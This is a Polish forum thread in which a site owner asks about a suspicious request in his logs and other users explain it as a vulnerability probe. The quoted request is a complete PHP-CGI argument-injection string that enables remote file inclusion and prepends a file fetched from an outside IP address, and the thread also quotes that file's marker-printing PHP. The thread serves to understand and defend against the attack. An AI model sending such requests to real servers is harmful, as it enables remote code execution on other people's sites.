 Dziwne parametry w linku |
| Dziwne parametry w linku |
Post
#1
|
|
|
Grupa: Zarejestrowani Postów: 35 Pomógł: 9 Dołączył: 16.11.2012 Ostrzeżenie: (0%) 
 |
Witam
Zauważyłem że ktoś odwiedza moją stronę z takimi parametrami zawartymi w linku: /index.php?-dsafe_mode?Off+-ddisable_functions?NULL+-dallow_url_fopen?On+-dallow_url_include?On+-dauto_prepend_file?http://178.63.8.214/echo.txt Czy ktoś może mi pomóc rozszyfrować o co chodzi? Prawdopodobnie próbuje obejść zabezpieczenia i włączyć otwieranie plików przez url. Nie wiem tylko czemu służy ten plik echo.txt, w którym jest kawałek kodu php: <?php echo "dsfer34w5rlsidfosdedfpsd";?> Może ktoś już miał z tym styczność i wie co kryje się za magicznym ciągiem znaków: dsfer34w5rlsidfosdedfpsd Będę wdzięczny za pomoc, pozdrawiam:) |
 |
 
|
 |
|
Post
#2
|
|
|
Developer Grupa: Moderatorzy Postów: 3 045 Pomógł: 290 Dołączył: 20.01.2007 |
Cytat(andrew654 @ 17.11.2012, 08:57:41 )  (...) który na pewno nigdzie na stronie się nie pojawia i będzie wiedział, że udało mu się coś dołączyć do strony skanując jej źródło Możesz go sobie szukać w źródle i go nie znajdziesz. Ten ciąg pojawi się (tylko w tym jednym żądaniu) wtedy gdy ktoś odwiedzi stronę z takimi parametrami, a strona jest podatna na tego typu atak (oczywiście jest to też kwestia konfiguracji serwera). To nie tak że jak nie znajdziesz tego ciągu w źródle strony to jesteś bezpieczny. |
|
|
|
andrew654 Dziwne parametry w linku 16.11.2012, 23:18:41 
webdice Atakujący próbuje dołączyć plik echo.txt. Jeśli mu... 17.11.2012, 00:12:39 
andrew654 Cytat(webdice @ 17.11.2012, 00:12:39 ... 17.11.2012, 08:57:41  |
|
Aktualny czas: 14.10.2025 - 22:07 |
